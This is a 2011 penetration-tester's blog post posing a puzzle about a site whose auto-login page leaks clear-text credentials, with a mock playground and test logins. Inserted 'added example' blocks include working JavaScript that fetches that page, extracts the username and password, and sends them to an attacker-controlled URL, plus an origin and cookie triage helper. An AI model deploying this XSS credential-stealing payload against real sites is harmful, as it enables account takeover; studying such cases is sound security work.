Monday, February 7, 2011

Tricky exploit - a penetration test puzzle



In a recent application security audit for a web site I came across a big, glaring breach.
While it's always fun to find a good vulnerability, it turned out to be quite tricky to actually exploit it. The trickiness was not due to good security practices but to pure (un)luck (depending on whose point of view): every angle I tried was off by just a tiny bit.

Eventually I managed to find an interesting multiphase exploit vector, and I think it makes for some interesting tinkering/reading. I've created a mock-up replica of the vulnerable web site to allow for testing and analysis. After reading the introductory section about the vulnerability, you may wish to try your wit against the mock site and find the exploit yourself, before reading on to the detailed write-up.





The Target Site
This was your ordinary small company site.
It had 3 sub-systems:
1. a public site, available to any user.
2. a client site, requiring a login.
3. a printing system, requiring its own login.

After logging in to the client site, the user was shown a menu containing a link to the printing system. For the user's convenience, that link would reuse the credentials given at the client login and pass them on to the printing system for authentication. A poor man's SSO, so to speak.



The Breach
It turned out that this "convenience" pulled the user's credentials and posted them to the printing system in clear text, via a client-side redirect!

Initially the user supplies the login credentials to the client site (login.php).
If successful, a menu is presented (menu.php).
A click on the "Go to Printing" link sends the browser to an intermediate page (printAutoLogin.php) that contains the user's credentials in a pre-filled form, which is immediately auto-submitted to the printing system's login page (printSystem.php) for validation.


Figure 1. Client side SSO. First redirect fetches user credentials and passes them to Print System.


The flaw is severe and obvious: the URL printAutoLogin.php returns the current user's name and password in clear text! This information is of course very valuable to an attacker. The only question remaining is: how can he get it?



Exploitation Problems
Finding a breach is one thing. Showing a functional proof-of-concept attack that exploits it is sometimes quite another. While the breach is what the client actually pays for, it is the exploit that earns his respect and admiration. Usually getting a working exploit takes some dull, dirty work of fitting loose ends into place, but in this case it turned out to be an interesting puzzle.

What I wanted to do was leverage an XSS vulnerability I had found in the site to get the user's credentials. One way to do this would be to obtain the session cookie and use it to request the tell-tale URL while impersonating the legitimate user (assuming no IP checks are done). The cookie was set HttpOnly, so script could not read it through document.cookie, which made this vector harder.

Another option was to fetch the credentials on the client side (with an XMLHttpRequest, which attaches the session cookie automatically on a same-origin request, HttpOnly or not) and have them sent directly to the attacker. This would sidestep the HttpOnly problem, and would also be much cooler...
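To make the client-side route concrete, here is an added example (not code from the original post or from the mock site) of what such a payload would do if it ran in the same origin as printAutoLogin.php: fetch the auto-login page with the victim's cookie, pull the credentials out of the pre-filled form, and ship them off. The sample HTML, the field names `user`/`pass` and the exfiltration URL are constructed assumptions; the real field names on the playground have to be read from a proxy.

```javascript
// Added example, not from the original post. Demonstrates the XHR route:
// same-origin fetch of the auto-login page, then credential extraction.

// Constructed stand-in for the response of printAutoLogin.php.
// Field names are assumptions.
const SAMPLE_AUTOLOGIN_HTML = `<html><body onload="document.forms[0].submit()">
<form method="POST" action="https://www.example.com/printSystem.php">
  <input type="hidden" name="user" value="user123">
  <input type="hidden" name="pass" value="pass123">
</form></body></html>`;

// Collect name -> value for every <input> in a page body.
// Handles single- and double-quoted attributes in any order; unquoted
// attribute values are not handled (the mock page does not use them).
function extractFormFields(html) {
  const fields = {};
  const inputRe = /<input\b[^>]*>/gi;
  const attrRe = /(\w+)\s*=\s*("([^"]*)"|'([^']*)')/g;
  for (const tag of html.match(inputRe) || []) {
    const attrs = {};
    for (const m of tag.matchAll(attrRe)) {
      attrs[m[1].toLowerCase()] = m[3] !== undefined ? m[3] : m[4];
    }
    if (attrs.name !== undefined) fields[attrs.name] = attrs.value || '';
  }
  return fields;
}

// Pick the credential pair out of the form; null if either field is absent.
function credentialsFrom(html, userField = 'user', passField = 'pass') {
  const f = extractFormFields(html);
  if (!(userField in f) || !(passField in f)) return null;
  return { user: f[userField], pass: f[passField] };
}

// Browser-side payload. Only meaningful when the XSS runs in the same
// origin as autoLoginUrl: the browser then attaches the session cookie
// (HttpOnly does not matter for this) and lets script read the response.
// exfilUrl is an assumed attacker-controlled endpoint.
function stealCredentials(autoLoginUrl, exfilUrl) {
  const xhr = new XMLHttpRequest();
  xhr.open('GET', autoLoginUrl, true);
  xhr.onload = function () {
    const creds = credentialsFrom(xhr.responseText);
    if (!creds) return;
    // Exfiltrate via an image request so no response handling is needed.
    new Image().src = exfilUrl + '?c=' + encodeURIComponent(JSON.stringify(creds));
  };
  xhr.send();
}
```

The parsing part runs anywhere (Node or browser); `stealCredentials` needs a browser and, as the next section explains, a same-origin injection point, which is exactly what the real site did not offer.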


In practice XSS flaws were abundant. I found several around the site, but they were all just a bit off. Two were in different sub-domains: the session cookie was not set for those hosts, and the same-origin policy prohibited them from making cross-(sub)domain XMLHttpRequest calls. Another XSS was actually on the same host but reached over HTTP, whereas the rest of the site was served over HTTPS, so again no cookie (it was flagged Secure) and, since the scheme is part of the origin, no cross-protocol calls either.
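The three dead ends above come down to two checks a practitioner makes for every candidate injection point: is it the same origin (scheme, host, port) as printAutoLogin.php, and does the session cookie even reach the page the payload runs on? The following added example (not from the original post) encodes both checks as a small triage helper and runs it over constructed URLs that mirror the post's three cases; the hostnames, the cookie name PHPSESSID and its attributes are assumptions.

```javascript
// Added example, not from the original post: origin and cookie triage for
// XSS candidates against a credential-leaking page.

// Same-origin policy: scheme, host and port must all match, otherwise an
// XMLHttpRequest from the XSS page cannot read the target's response.
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol && ua.hostname === ub.hostname && ua.port === ub.port;
}

// Would a cookie with these attributes be attached to a request to `url`?
// Host-only cookies (no Domain attribute) match the exact host only;
// a Domain cookie matches that domain and its subdomains;
// Secure cookies travel only over https. Path is ignored (site used "/").
function cookieSent(cookie, url) {
  const u = new URL(url);
  if (cookie.secure && u.protocol !== 'https:') return false;
  const host = u.hostname.toLowerCase();
  if (cookie.domain) {
    const d = cookie.domain.replace(/^\./, '').toLowerCase();
    return host === d || host.endsWith('.' + d);
  }
  return host === cookie.host.toLowerCase();
}

// Verdict for one XSS location: which of the two conditions fail.
function triage(xssUrl, targetUrl, sessionCookie) {
  const problems = [];
  if (!sameOrigin(xssUrl, targetUrl)) problems.push('cross-origin: XHR cannot read the target');
  if (!cookieSent(sessionCookie, xssUrl)) problems.push('session cookie not sent to the XSS page');
  return { usable: problems.length === 0, problems };
}

// Constructed scenario mirroring the post: HTTPS client site, host-only
// Secure + HttpOnly session cookie. Names and hosts are assumptions.
const TARGET = 'https://www.example.com/printAutoLogin.php';
const SESSION = { name: 'PHPSESSID', host: 'www.example.com', secure: true, httpOnly: true };
const CANDIDATES = {
  otherSubdomain: 'https://static.example.com/search.php?q=',
  sameHostPlainHttp: 'http://www.example.com/feedback.php?msg=',
  sameOrigin: 'https://www.example.com/search.php?q=',
};

function triageAll() {
  const out = {};
  for (const [label, url] of Object.entries(CANDIDATES)) {
    out[label] = triage(url, TARGET, SESSION);
  }
  return out;
}
```

Running `triageAll()` flags the sub-domain and plain-HTTP candidates on both counts and passes only the (hypothetical) HTTPS same-host one, which is the kind of injection point the real site did not provide.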

Close but no cigar. Yet.



Playground version
Before I continue describing the exploitation method I found, I offer you the chance to play around and find it yourself: I've recreated the relevant parts as a simplified mock website that you can experiment with.

The website home page is: http://www.g1.playground.quaji.com/
Valid user credentials are : Name:user123 Password:pass123

You are welcome to stop reading and try your wit against it.
Note that this is not an armchair pen-test riddle. You'll have to get your proxies dirty to find some relevant details that I didn't describe yet to figure it out.

Your goal is to find and craft an XSS payload that will cause the user credentials to be sent to the attacker (an alert box with the info would do).




Feel free to leave your comments.
Please post only non-spoiler comments here, and the rest on the solution entry.


Solution
The detailed exploitation is provided in a separate blog entry.

48 comments:

  1. Thank you for sharing, it's a very nice situation and setup. I'll play with it soon.

  2. Awesome! Congratulations!

  3. Yes, how the attacker creates "XSS PAYLOAD 2" is not so clear, and it only works with PHPSESSID=1337.
    Please explain how XSS Payload 2 is added to printAutoLogin.php's password field.
